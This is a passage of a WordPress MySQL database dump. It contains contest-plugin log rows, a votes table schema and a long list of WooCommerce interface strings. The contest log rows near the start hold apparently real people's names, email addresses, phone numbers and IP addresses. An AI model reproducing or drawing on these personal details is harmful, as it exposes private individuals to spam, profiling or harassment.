INSERT INTO `wp_totalcontest_log` VALUES (3,'171.61.100.183','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36',1,900,905,'submission','accepted','{\"fields\":{\"field\":\"Nimya Jose\",\"field_copy\":\"nimyajose10@gmail.com\",\"field_copy_copy\":\"9497674907\",\"field_copy_copy_copy\":904,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"}}','2022-02-09 13:45:01'),(4,'171.61.100.183','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36',1,900,905,'vote','accepted','{\"type\":\"count\"}','2022-02-09 13:45:25'),(5,'122.167.88.3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',21,900,1010,'submission','accepted','{\"fields\":{\"field\":\"pavithra g\",\"field_copy\":\"pavitra@utfindia.in\",\"field_copy_copy\":\"07411722844\",\"field_copy_copy_copy\":1009,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"}}','2022-02-25 04:05:42'),(6,'116.75.116.132','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',27,900,1266,'submission','accepted','{\"fields\":{\"field\":\"pavithra g\",\"field_copy\":\"pavitra@utfindia.in\",\"field_copy_copy\":\"07411722844\",\"field_copy_copy_copy\":1265,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"}}','2022-03-14 06:00:52'),(7,'116.75.116.132','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',27,900,1268,'submission','accepted','{\"fields\":{\"field\":\"\",\"field_copy\":\"\",\"field_copy_copy\":\"\",\"field_copy_copy_copy\":null,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"}}','2022-03-14 06:04:02');
/*!40000 ALTER TABLE `wp_totalcontest_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_totalcontest_votes`
--

DROP TABLE IF EXISTS `wp_totalcontest_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_totalcontest_votes` (
  `submission_id` bigint(20) unsigned NOT NULL,
  `contest_id` bigint(20) unsigned NOT NULL,
  `votes` bigint(20) NOT NULL,
  `last_vote_at` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`submission_id`),
  UNIQUE KEY `SUBMISSION_ID_UNIQUE` (`submission_id`),
  KEY `CONTEST_ID` (`contest_id`),
  KEY `VOTES` (`votes`),
  KEY `LAST_VOTE_AT` (`last_vote_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_totalcontest_votes`
--

LOCK TABLES `wp_totalcontest_votes` WRITE;
/*!40000 ALTER TABLE `wp_totalcontest_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_totalcontest_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_trp_gettext_en_us`
--

DROP TABLE IF EXISTS `wp_trp_gettext_en_us`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_trp_gettext_en_us` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `original` longtext NOT NULL,
  `translated` longtext DEFAULT NULL,
  `domain` longtext DEFAULT NULL,
  `status` int(20) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`),
  KEY `index_name` (`original`(100)),
  FULLTEXT KEY `original_fulltext` (`original`)
) ENGINE=InnoDB AUTO_INCREMENT=1672 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_trp_gettext_en_us`
--

LOCK TABLES `wp_trp_gettext_en_us` WRITE;
/*!40000 ALTER TABLE `wp_trp_gettext_en_us` DISABLE KEYS */;
INSERT INTO `wp_trp_gettext_en_us` VALUES (1,'General','','woocommerce',0),(2,'Products','','woocommerce',0),(3,'Tax','','woocommerce',0),(4,'Shipping','','woocommerce',0),(5,'Payments','','woocommerce',0),(6,'Accounts &amp; Privacy','','woocommerce',0),(7,'Emails','','woocommerce',0),(8,'Integration','','woocommerce',0),(9,'Advanced','','woocommerce',0),(10,'New order','','woocommerce',0),(11,'New order emails are sent to chosen recipient(s) when a new order is received.','','woocommerce',0),(12,'Available placeholders: %s','','woocommerce',0),(13,'Enable/Disable','','woocommerce',0),(14,'Enable this email notification','','woocommerce',0),(15,'Recipient(s)','','woocommerce',0),(16,'Enter recipients (comma separated) for this email. Defaults to %s.','','woocommerce',0),(17,'Subject','','woocommerce',0),(18,'[{site_title}]: New order #{order_number}','','woocommerce',0),(19,'Email heading','','woocommerce',0),(20,'New Order: #{order_number}','','woocommerce',0),(21,'Additional content','','woocommerce',0),(22,'Text to appear below the main email content.','','woocommerce',0),(23,'N/A','','woocommerce',0),(24,'Congratulations on the sale.','','woocommerce',0),(25,'Email type','','woocommerce',0),(26,'Choose which format of email to send.','','woocommerce',0),(27,'Plain text','','woocommerce',0),(28,'HTML','','woocommerce',0),(29,'Multipart','','woocommerce',0),(30,'Cancelled order','','woocommerce',0),(31,'Cancelled order emails are sent to chosen recipient(s) when orders have been marked cancelled (if they were previously processing or on-hold).','','woocommerce',0),(32,'[{site_title}]: Order #{order_number} has been cancelled','','woocommerce',0),(33,'Order Cancelled: #{order_number}','','woocommerce',0),(34,'Thanks for reading.','','woocommerce',0),(35,'Failed order','','woocommerce',0),(36,'Failed order emails are sent to chosen recipient(s) when orders have been marked failed (if they were previously pending or on-hold).','','woocommerce',0),(37,'[{site_title}]: Order #{order_number} has failed','','woocommerce',0),(38,'Order Failed: #{order_number}','','woocommerce',0),(39,'Hopefully they’ll be back. Read more about <a href=\"https://docs.woocommerce.com/document/managing-orders/\">troubleshooting failed payments</a>.','','woocommerce',0),(40,'Order on-hold','','woocommerce',0),(41,'This is an order notification sent to customers containing order details after an order is placed on-hold from Pending, Cancelled or Failed order status.','','woocommerce',0),(42,'Your {site_title} order has been received!','','woocommerce',0),(43,'Thank you for your order','','woocommerce',0),(44,'We look forward to fulfilling your order soon.','','woocommerce',0),(45,'Processing order','','woocommerce',0),(46,'This is an order notification sent to customers containing order details after payment.','','woocommerce',0),(47,'Thanks for using {site_url}!','','woocommerce',0),(48,'Completed order','','woocommerce',0),(49,'Order complete emails are sent to customers when their orders are marked completed and usually indicate that their orders have been shipped.','','woocommerce',0),(50,'Your {site_title} order is now complete','','woocommerce',0),(51,'Thanks for shopping with us','','woocommerce',0),(52,'Thanks for shopping with us.','','woocommerce',0),(53,'Refunded order','','woocommerce',0),(54,'Order refunded emails are sent to customers when their orders are refunded.','','woocommerce',0),(55,'Full refund subject','','woocommerce',0),(56,'Your {site_title} order #{order_number} has been refunded','','woocommerce',0),(57,'Partial refund subject','','woocommerce',0),(58,'Your {site_title} order #{order_number} has been partially refunded','','woocommerce',0),(59,'Full refund email heading','','woocommerce',0),(60,'Order Refunded: {order_number}','','woocommerce',0),(61,'Partial refund email heading','','woocommerce',0),(62,'Partial Refund: Order {order_number}','','woocommerce',0),(63,'We hope to see you again soon.','','woocommerce',0),(64,'Customer invoice / Order details','','woocommerce',0),(65,'Customer invoice emails can be sent to customers containing their order information and payment links.','','woocommerce',0),(66,'Your latest {site_title} invoice','','woocommerce',0),(67,'Your invoice for order #{order_number}','','woocommerce',0),(68,'Subject (paid)','','woocommerce',0),(69,'Invoice for order #{order_number} on {site_title}','','woocommerce',0),(70,'Email heading (paid)','','woocommerce',0),(71,'Invoice for order #{order_number}','','woocommerce',0),(72,'Customer note','','woocommerce',0),(73,'Customer note emails are sent when you add a note to an order.','','woocommerce',0),(74,'Note added to your {site_title} order from {order_date}','','woocommerce',0),(75,'A note has been added to your order','','woocommerce',0),(76,'Reset password','','woocommerce',0),(77,'Customer \"reset password\" emails are sent when customers reset their passwords.','','woocommerce',0),(78,'Password Reset Request for {site_title}','','woocommerce',0),(79,'Password Reset Request','','woocommerce',0),(80,'New account','','woocommerce',0),(81,'Customer \"new account\" emails are sent to the customer when a customer signs up via checkout or account pages.','','woocommerce',0),(82,'Your {site_title} account has been created!','','woocommerce',0),(83,'Welcome to {site_title}','','woocommerce',0),(84,'We look forward to seeing you soon.','','woocommerce',0),(85,'Scope under which the request is made; determines fields present in response.','','woocommerce',0),(86,'List of applied cart coupons.','','woocommerce',0),(87,'The coupon\'s unique code.','','woocommerce',0),(88,'The discount type for the coupon (e.g. percentage or fixed amount)','','woocommerce',0),(89,'Total amounts provided using the smallest unit of the currency.','','woocommerce',0),(90,'Currency code (in ISO format) for returned prices.','','woocommerce',0),(91,'Currency symbol for the currency which can be used to format returned prices.','','woocommerce',0),(92,'Currency minor unit (number of digits after the decimal separator) for returned prices.','','woocommerce',0),(93,'Decimal separator for the currency which can be used to format returned prices.','','woocommerce',0),(94,'Thousand separator for the currency which can be used to format returned prices.','','woocommerce',0),(95,'Price prefix for the currency which can be used to format returned prices.','','woocommerce',0),(96,'Total discount applied by this coupon.','','woocommerce',0),(97,'Total tax removed due to discount applied by this coupon.','','woocommerce',0),(98,'List of available shipping rates for the cart.','','woocommerce',0),(99,'The ID of the package the shipping rates belong to.','','woocommerce',0),(100,'Name of the package.','','woocommerce',0),(101,'Shipping destination address.','','woocommerce',0),(102,'First line of the address being shipped to.','','woocommerce',0),(103,'Second line of the address being shipped to.','','woocommerce',0),(104,'City of the address being shipped to.','','woocommerce',0),(105,'ISO code, or name, for the state, province, or district of the address being shipped to.','','woocommerce',0),(106,'Zip or Postcode of the address being shipped to.','','woocommerce',0),(107,'ISO code for the country of the address being shipped to.','','woocommerce',0),(108,'List of cart items the returned shipping rates apply to.','','woocommerce',0),(109,'Unique identifier for the item within the cart.','','woocommerce',0),(110,'Name of the item.','','woocommerce',0),(111,'Quantity of the item in the current package.','','woocommerce',0),(112,'List of shipping rates.','','woocommerce',0),(113,'ID of the shipping rate.','','woocommerce',0),(114,'Name of the shipping rate, e.g. Express shipping.','','woocommerce',0),(115,'Description of the shipping rate, e.g. Dispatched via USPS.','','woocommerce',0),(116,'Delivery time estimate text, e.g. 3-5 business days.','','woocommerce',0),(117,'Price of this shipping rate using the smallest unit of the currency.','','woocommerce',0),(118,'Taxes applied to this shipping rate using the smallest unit of the currency.','','woocommerce',0),(119,'ID of the shipping method that provided the rate.','','woocommerce',0),(120,'Instance ID of the shipping method that provided the rate.','','woocommerce',0),(121,'Meta data attached to the shipping rate.','','woocommerce',0),(122,'Meta key.','','woocommerce',0),(123,'Meta value.','','woocommerce',0),(124,'True if this is the rate currently selected by the customer for the cart.','','woocommerce',0),(125,'Current set shipping address for the customer.','','woocommerce',0),(126,'First name','','woocommerce',0),(127,'Last name','','woocommerce',0),(128,'Company','','woocommerce',0),(129,'Address','','woocommerce',0),(130,'Apartment, suite, etc.','','woocommerce',0),(131,'City','','woocommerce',0),(132,'State/County code, or name of the state, county, province, or district.','','woocommerce',0),(133,'Postal code','','woocommerce',0),(134,'Country/Region code in ISO 3166-1 alpha-2 format.','','woocommerce',0),(135,'Phone','','woocommerce',0),(136,'Current set billing address for the customer.','','woocommerce',0),(137,'Email','','woocommerce',0),(138,'List of cart items.','','woocommerce',0),(139,'The cart item product or variation ID.','','woocommerce',0),(140,'Quantity of this item in the cart.','','woocommerce',0),(141,'The maximum quantity than can be added to the cart at once.','','woocommerce',0),(142,'Product name.','','woocommerce',0),(143,'Product short description in HTML format.','','woocommerce',0),(144,'Product full description in HTML format.','','woocommerce',0),(145,'Stock keeping unit, if applicable.','','woocommerce',0),(146,'Quantity left in stock if stock is low, or null if not applicable.','','woocommerce',0),(147,'True if backorders are allowed past stock availability.','','woocommerce',0),(148,'True if the product is on backorder.','','woocommerce',0),(149,'If true, only one item of this product is allowed for purchase in a single order.','','woocommerce',0),(150,'Product URL.','','woocommerce',0),(151,'List of images.','','woocommerce',0),(152,'Image ID.','','woocommerce',0),(153,'Full size image URL.','','woocommerce',0),(154,'Thumbnail URL.','','woocommerce',0),(155,'Thumbnail srcset for responsive images.','','woocommerce',0),(156,'Thumbnail sizes for responsive images.','','woocommerce',0),(157,'Image name.','','woocommerce',0),(158,'Image alternative text.','','woocommerce',0),(159,'Chosen attributes (for variations).','','woocommerce',0),(160,'Variation attribute name.','','woocommerce',0),(161,'Variation attribute value.','','woocommerce',0),(162,'Metadata related to the cart item','','woocommerce',0),(163,'Name of the metadata.','','woocommerce',0),(164,'Value of the metadata.','','woocommerce',0),(165,'Optionally, how the metadata value should be displayed to the user.','','woocommerce',0),(166,'Price data for the product in the current line item, including or excluding taxes based on the \"display prices during cart and checkout\" setting. Provided using the smallest unit of the currency.','','woocommerce',0),(167,'Current product price.','','woocommerce',0),(168,'Regular product price.','','woocommerce',0),(169,'Sale product price, if applicable.','','woocommerce',0),(170,'Price range, if applicable.','','woocommerce',0),(171,'Price amount.','','woocommerce',0),(172,'Raw unrounded product prices used in calculations. Provided using a higher unit of precision than the currency.','','woocommerce',0),(173,'Decimal precision of the returned prices.','','woocommerce',0),(174,'Item total amounts provided using the smallest unit of the currency.','','woocommerce',0),(175,'Line subtotal (the price of the product before coupon discounts have been applied).','','woocommerce',0),(176,'Line subtotal tax.','','woocommerce',0),(177,'Line total (the price of the product after coupon discounts have been applied).','','woocommerce',0),(178,'Line total tax.','','woocommerce',0),(179,'Whether the product is visible in the catalog','','woocommerce',0),(180,'Number of items in the cart.','','woocommerce',0),(181,'Total weight (in grams) of all products in the cart.','','woocommerce',0),(182,'True if the cart needs payment. False for carts with only free products and no shipping costs.','','woocommerce',0),(183,'True if the cart needs shipping. False for carts with only digital goods or stores with no shipping methods set-up.','','woocommerce',0),(184,'True if the cart meets the criteria for showing shipping costs, and rates have been calculated and included in the totals.','','woocommerce',0),(185,'List of cart fees.','','woocommerce',0),(186,'Unique identifier for the fee within the cart.','','woocommerce',0),(187,'Fee name.','','woocommerce',0),(188,'Fee total amounts provided using the smallest unit of the currency.','','woocommerce',0),(189,'Total amount for this fee.','','woocommerce',0),(190,'Total tax amount for this fee.','','woocommerce',0),(191,'Cart total amounts provided using the smallest unit of the currency.','','woocommerce',0),(192,'Total price of items in the cart.','','woocommerce',0),(193,'Total tax on items in the cart.','','woocommerce',0),(194,'Total price of any applied fees.','','woocommerce',0),(195,'Total tax on fees.','','woocommerce',0),(196,'Total discount from applied coupons.','','woocommerce',0),(197,'Total tax removed due to discount from applied coupons.','','woocommerce',0),(198,'Total price of shipping. If shipping has not been calculated, a null response will be sent.','','woocommerce',0),(199,'Total tax on shipping. If shipping has not been calculated, a null response will be sent.','','woocommerce',0),(200,'Total price the customer will pay.','','woocommerce',0),(201,'Total tax applied to items and shipping.','','woocommerce',0),(202,'Lines of taxes applied to items and shipping.','','woocommerce',0),(203,'The name of the tax.','','woocommerce',0),(204,'The amount of tax charged.','','woocommerce',0),(205,'The rate at which tax is applied.','','woocommerce',0),(206,'List of cart item errors, for example, items in the cart which are out of stock.','','woocommerce',0),(207,'Error code','','woocommerce',0),(208,'Error message','','woocommerce',0),(209,'List of required payment gateway features to process the order.','','woocommerce',0),(210,'Unique identifier for the coupon within the cart.','','woocommerce',0),(211,'Extension\'s name - this will be used to ensure the data in the request is routed appropriately.','','woocommerce',0),(212,'Additional data to pass to the extension','','woocommerce',0),(213,'Unique identifier (key) for the cart item.','','woocommerce',0),(214,'The ID of the package being shipped.','','woocommerce',0),(215,'The chosen rate ID for the package.','','woocommerce',0),(216,'Unique identifier (key) for the cart item to update.','','woocommerce',0),(217,'New quantity of the item in the cart.','','woocommerce',0),(218,'Billing address.','','woocommerce',0),(219,'Shipping address.','','woocommerce',0),(220,'The order ID to process during checkout.','','woocommerce',0),(221,'Order status. Payment providers will update this value after payment.','','woocommerce',0),(222,'Order key used to check validity or protect access to certain order data.','','woocommerce',0),(223,'Note added to the order by the customer during checkout.','','woocommerce',0),(224,'Customer ID if registered. Will return 0 for guests.','','woocommerce',0),(225,'The ID of the payment method being used to process the payment.','','woocommerce',0),(226,'Proceed to PayPal','','woocommerce',0),(227,'PayPal Standard','','woocommerce',0),(228,'PayPal Standard redirects customers to PayPal to enter their payment information.','','woocommerce',0),(229,'Enable PayPal Standard','','woocommerce',0),(230,'Title','','woocommerce',0),(231,'This controls the title which the user sees during checkout.','','woocommerce',0),(232,'PayPal','','woocommerce',0),(233,'Description','','woocommerce',0),(234,'This controls the description which the user sees during checkout.','','woocommerce',0),(235,'Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account.','','woocommerce',0),(236,'PayPal email','','woocommerce',0),(237,'Please enter your PayPal email address; this is needed in order to take payment.','','woocommerce',0),(238,'Advanced options','','woocommerce',0),(239,'PayPal sandbox','','woocommerce',0),(240,'Enable PayPal sandbox','','woocommerce',0),(241,'PayPal sandbox can be used to test payments. Sign up for a <a href=\"%s\">developer account</a>.','','woocommerce',0),(242,'Debug log','','woocommerce',0),(243,'Enable logging','','woocommerce',0),(244,'Log PayPal events, such as IPN requests, inside %s Note: this may log personal information. We recommend using this for debugging purposes only and deleting the logs when finished.','','woocommerce',0),(245,'IPN email notifications','','woocommerce',0),(246,'Enable IPN email notifications','','woocommerce',0),(247,'Send notifications when an IPN is received from PayPal indicating refunds, chargebacks and cancellations.','','woocommerce',0),(248,'Receiver email','','woocommerce',0),(249,'If your main PayPal email differs from the PayPal email entered above, input your main receiver email for your PayPal account here. This is used to validate IPN requests.','','woocommerce',0),(250,'PayPal identity token','','woocommerce',0),(251,'Optionally enable \"Payment Data Transfer\" (Profile > Profile and Settings > My Selling Tools > Website Preferences) and then copy your identity token here. This will allow payments to be verified without the need for PayPal IPN.','','woocommerce',0),(252,'Invoice prefix','','woocommerce',0),(253,'Please enter a prefix for your invoice numbers. If you use your PayPal account for multiple stores ensure this prefix is unique as PayPal will not allow orders with the same invoice number.','','woocommerce',0),(254,'Shipping details','','woocommerce',0),(255,'Send shipping details to PayPal instead of billing.','','woocommerce',0),(256,'PayPal allows us to send one address. If you are using PayPal for shipping labels you may prefer to send the shipping address rather than billing. Turning this option off may prevent PayPal Seller protection from applying.','','woocommerce',0),(257,'Address override','','woocommerce',0),(258,'Enable \"address_override\" to prevent address information from being changed.','','woocommerce',0),(259,'PayPal verifies addresses therefore this setting can cause errors (we recommend keeping it disabled).','','woocommerce',0),(260,'Payment action','','woocommerce',0),(261,'Choose whether you wish to capture funds immediately or authorize payment only.','','woocommerce',0),(262,'Capture','','woocommerce',0),(263,'Authorize','','woocommerce',0),(264,'Image url','','woocommerce',0),(265,'Optionally enter the URL to a 150x50px image displayed as your logo in the upper left corner of the PayPal checkout pages.','','woocommerce',0),(266,'Optional','','woocommerce',0),(267,'API credentials','','woocommerce',0),(268,'Enter your PayPal API credentials to process refunds via PayPal. Learn how to access your <a href=\"%s\">PayPal API Credentials</a>.','','woocommerce',0),(269,'Live API username','','woocommerce',0),(270,'Get your API credentials from PayPal.','','woocommerce',0),(271,'Live API password','','woocommerce',0),(272,'Live API signature','','woocommerce',0),(273,'Sandbox API username','','woocommerce',0),(274,'Sandbox API password','','woocommerce',0),(275,'Sandbox API signature','','woocommerce',0),(276,'Direct bank transfer','','woocommerce',0),(277,'Take payments in person via BACS. More commonly known as direct bank/wire transfer.','','woocommerce',0),(278,'Enable bank transfer','','woocommerce',0),(279,'Payment method description that the customer will see on your checkout.','','woocommerce',0),(280,'Make your payment directly into our bank account. Please use your Order ID as the payment reference. Your order will not be shipped until the funds have cleared in our account.','','woocommerce',0),(281,'Instructions','','woocommerce',0),(282,'Instructions that will be added to the thank you page and emails.','','woocommerce',0),(283,'Check payments','','woocommerce',0),(284,'Take payments in person via checks. This offline gateway can also be useful to test purchases.','','woocommerce',0),(285,'Enable check payments','','woocommerce',0),(286,'Please send a check to Store Name, Store Street, Store Town, Store State / County, Store Postcode.','','woocommerce',0),(287,'Cash on delivery','','woocommerce',0),(288,'Have your customers pay with cash (or by other means) upon delivery.','','woocommerce',0),(289,'Enable cash on delivery','','woocommerce',0),(290,'Payment method description that the customer will see on your website.','','woocommerce',0),(291,'Pay with cash upon delivery.','','woocommerce',0),(292,'Instructions that will be added to the thank you page.','','woocommerce',0),(293,'Enable for shipping methods','','woocommerce',0),(294,'If COD is only available for certain methods, set it up here. Leave blank to enable for all methods.','','woocommerce',0),(295,'Select shipping methods','','woocommerce',0),(296,'Accept for virtual orders','','woocommerce',0),(297,'Accept COD if the order is virtual','','woocommerce',0),(298,'Select Webhook Events','','woocommerce',0),(299,'Whether to create a new user account as part of order processing.','','woocommerce',0),(300,'Result of payment processing, or false if not yet processed.','','woocommerce',0),(301,'Status of the payment returned by the gateway. One of success, pending, failure, error.','','woocommerce',0),(302,'An array of data being returned from the payment gateway.','','woocommerce',0),(303,'A URL to redirect the customer after checkout. This could be, for example, a link to the payment processors website.','','woocommerce',0),(304,'Data to pass through to the payment method when processing payment.','','woocommerce',0),(305,'Unique identifier for the resource.','','woocommerce',0),(306,'Attribute name.','','woocommerce',0),(307,'The attribute taxonomy name.','','woocommerce',0),(308,'Attribute type.','','woocommerce',0),(309,'How terms in this attribute are sorted by default.','','woocommerce',0),(310,'If this attribute has term archive pages.','','woocommerce',0),(311,'Number of terms in the attribute taxonomy.','','woocommerce',0),(312,'Unique identifier for the attribute.','','woocommerce',0),(313,'Term name.','','woocommerce',0),(314,'String based identifier for the term.','','woocommerce',0),(315,'Term description.','','woocommerce',0),(316,'Parent term ID, if applicable.','','woocommerce',0),(317,'Number of objects (posts of any type) assigned to the term.','','woocommerce',0),(318,'Current page of the collection.','','woocommerce',0),(319,'Maximum number of items to be returned in result set. Defaults to no limit if left blank.','','woocommerce',0),(320,'Limit results to those matching a string.','','woocommerce',0),(321,'Ensure result set excludes specific IDs.','','woocommerce',0),(322,'Limit result set to specific ids.','','woocommerce',0),(323,'Sort ascending or descending.','','woocommerce',0),(324,'Sort by term property.','','woocommerce',0),(325,'If true, empty terms will not be returned.','','woocommerce',0),(326,'Category image.','','woocommerce',0),(327,'Number of reviews for products in this category.','','woocommerce',0),(328,'Category URL.','','woocommerce',0),(329,'Min and max prices found in collection of products, provided using the smallest unit of the currency.','','woocommerce',0),(330,'Min price found in collection of products.','','woocommerce',0),(331,'Max price found in collection of products.','','woocommerce',0),(332,'Returns number of products within attribute terms.','','woocommerce',0),(333,'Term ID','','woocommerce',0),(334,'Number of products.','','woocommerce',0),(335,'Returns number of products with each average rating.','','woocommerce',0),(336,'Average rating','','woocommerce',0),(337,'Returns number of products with each stock status.','','woocommerce',0),(338,'Status','','woocommerce',0),(339,'Limit response to resources created after a given ISO8601 compliant date.','','woocommerce',0),(340,'Limit response to resources created before a given ISO8601 compliant date.','','woocommerce',0),(341,'When limiting response using after/before, which date column to compare against.','','woocommerce',0),(342,'Offset the result set by a specific number of items.','','woocommerce',0),(343,'Order sort attribute ascending or descending.','','woocommerce',0),(344,'Sort collection by object attribute.','','woocommerce',0),(345,'Limit result set to those of particular parent IDs.','','woocommerce',0),(346,'Limit result set to all items except those of a particular parent ID.','','woocommerce',0),(347,'Limit result set to products assigned a specific type.','','woocommerce',0),(348,'Simple product','','woocommerce',0),(349,'Grouped product','','woocommerce',0),(350,'External/Affiliate product','','woocommerce',0),(351,'Variable product','','woocommerce',0),(352,'Limit result set to products with specific SKU(s). Use commas to separate.','','woocommerce',0),(353,'Limit result set to featured products.','','woocommerce',0),(354,'Limit result set to products assigned a specific category ID.','','woocommerce',0),(355,'Operator to compare product category terms.','','woocommerce',0),(356,'Limit result set to products assigned a specific tag ID.','','woocommerce',0),(357,'Operator to compare product tags.','','woocommerce',0),(358,'Limit result set to products on sale.','','woocommerce',0),(359,'Limit result set to products based on a minimum price, provided using the smallest unit of the currency.','','woocommerce',0),(360,'Limit result set to products based on a maximum price, provided using the smallest unit of the currency.','','woocommerce',0),(361,'Limit result set to products with specified stock status.','','woocommerce',0),(362,'In stock','','woocommerce',0),(363,'Out of stock','','woocommerce',0),(364,'On backorder','','woocommerce',0),(365,'Limit result set to products with selected global attributes.','','woocommerce',0),(366,'Attribute taxonomy name.','','woocommerce',0),(367,'List of attribute term IDs.','','woocommerce',0),(368,'List of attribute slug(s). If a term ID is provided, this will be ignored.','','woocommerce',0),(369,'Operator to compare product attribute terms.','','woocommerce',0),(370,'The logical relationship between attributes when filtering across multiple at once.','','woocommerce',0),(371,'Determines if hidden or visible catalog products are shown.','','woocommerce',0),(372,'Limit result set to products with a certain average rating.','','woocommerce',0),(373,'If true, calculates the minimum and maximum product prices for the collection.','','woocommerce',0),(374,'If true, calculates stock counts for products in the collection.','','woocommerce',0),(375,'If requested, calculates attribute term counts for products in the collection.','','woocommerce',0),(376,'Taxonomy name.','','woocommerce',0),(377,'Query type being performed which may affect counts. Valid values include \"and\" and \"or\".','','woocommerce',0),(378,'If true, calculates rating counts for products in the collection.','','woocommerce',0),(379,'The date the review was created, in the site\'s timezone.','','woocommerce',0),(380,'The date the review was created, in the site\'s timezone in human-readable format.','','woocommerce',0),(381,'The date the review was created, as GMT.','','woocommerce',0),(382,'Unique identifier for the product that the review belongs to.','','woocommerce',0),(383,'Name of the product that the review belongs to.','','woocommerce',0),(384,'Permalink of the product that the review belongs to.','','woocommerce',0),(385,'Image of the product that the review belongs to.','','woocommerce',0),(386,'Reviewer name.','','woocommerce',0),(387,'The content of the review.','','woocommerce',0),(388,'Review rating (0 to 5).','','woocommerce',0),(389,'Shows if the reviewer bought the product or not.','','woocommerce',0),(390,'Avatar URL with image size of %d pixels.','','woocommerce',0),(391,'Avatar URLs for the object reviewer.','','woocommerce',0),(392,'Limit result set to reviews from specific category IDs.','','woocommerce',0),(393,'Limit result set to reviews from specific product IDs.','','woocommerce',0),(394,'ID of the parent product, if applicable.','','woocommerce',0),(395,'Product type.','','woocommerce',0),(396,'Product variation attributes, if applicable.','','woocommerce',0),(397,'Is the product on sale?','','woocommerce',0),(398,'Unique identifier.','','woocommerce',0),(399,'Price data provided using the smallest unit of the currency.','','woocommerce',0),(400,'Price string formatted as HTML.','','woocommerce',0),(401,'Reviews average rating.','','woocommerce',0),(402,'Amount of reviews that the product has.','','woocommerce',0),(403,'List of categories, if applicable.','','woocommerce',0),(404,'Category ID','','woocommerce',0),(405,'Category name','','woocommerce',0),(406,'Category slug','','woocommerce',0),(407,'Category link','','woocommerce',0),(408,'List of tags, if applicable.','','woocommerce',0),(409,'Tag ID','','woocommerce',0),(410,'Tag name','','woocommerce',0),(411,'Tag slug','','woocommerce',0),(412,'Tag link','','woocommerce',0),(413,'List of attributes assigned to the product/variation that are visible or used for variations.','','woocommerce',0),(414,'The attribute ID, or 0 if the attribute is not taxonomy based.','','woocommerce',0),(415,'The attribute name.','','woocommerce',0),(416,'The attribute taxonomy, or null if the attribute is not taxonomy based.','','woocommerce',0),(417,'True if this attribute is used by product variations.','','woocommerce',0),(418,'List of assigned attribute terms.','','woocommerce',0),(419,'The term ID, or 0 if the attribute is not a global attribute.','','woocommerce',0),(420,'The term name.','','woocommerce',0),(421,'The term slug.','','woocommerce',0),(422,'If this is a default attribute','','woocommerce',0),(423,'List of variation IDs, if applicable.','','woocommerce',0),(424,'List of variation attributes.','','woocommerce',0),(425,'The assigned attribute.','','woocommerce',0),(426,'Does the product have additional options before it can be added to the cart?','','woocommerce',0),(427,'Is the product purchasable?','','woocommerce',0),(428,'Is the product in stock?','','woocommerce',0),(429,'Is the product stock backordered? This will also return false if backorder notifications are turned off.','','woocommerce',0),(430,'Add to cart button parameters.','','woocommerce',0),(431,'Button text.','','woocommerce',0),(432,'Button description.','','woocommerce',0),(433,'Add to cart URL.','','woocommerce',0),(434,'ID of the note record.','','woocommerce',0),(435,'Name of the note.','','woocommerce',0),(436,'The type of the note (e.g. error, warning, etc.).','','woocommerce',0),(437,'Locale used for the note title and content.','','woocommerce',0),(438,'Title of the note.','','woocommerce',0),(439,'Content of the note.','','woocommerce',0),(440,'Content data for the note. JSON string. Available for re-localization.','','woocommerce',0),(441,'The status of the note (e.g. unactioned, actioned).','','woocommerce',0),(442,'Source of the note.','','woocommerce',0),(443,'Date the note was created.','','woocommerce',0),(444,'Date the note was created (GMT).','','woocommerce',0),(445,'Date after which the user should be reminded of the note, if any.','','woocommerce',0),(446,'Date after which the user should be reminded of the note, if any (GMT).','','woocommerce',0),(447,'Whether or not a user can request to be reminded about the note.','','woocommerce',0),(448,'An array of actions, if any, for the note.','','woocommerce',0),(449,'The layout of the note (e.g. banner, thumbnail, plain).','','woocommerce',0),(450,'The image of the note, if any.','','woocommerce',0),(451,'Registers whether the note is deleted or not','','woocommerce',0),(452,'Maximum number of items to be returned in result set.','','woocommerce',0),(453,'Type of note.','','woocommerce',0),(454,'Status of note.','','woocommerce',0),(455,'Source of note.','','woocommerce',0),(456,'Unique ID for the resource.','','woocommerce',0),(457,'Unique ID for the Note.','','woocommerce',0),(458,'Unique ID for the Note Action.','','woocommerce',0),(459,'Unique identifier for the object.','','woocommerce',0),(460,'Coupon code.','','woocommerce',0),(461,'The amount of discount. Should always be numeric, even if setting a percentage.','','woocommerce',0),(462,'The status of the coupon. Should always be draft, published, or pending review','','woocommerce',0),(463,'The date the coupon was created, in the site\'s 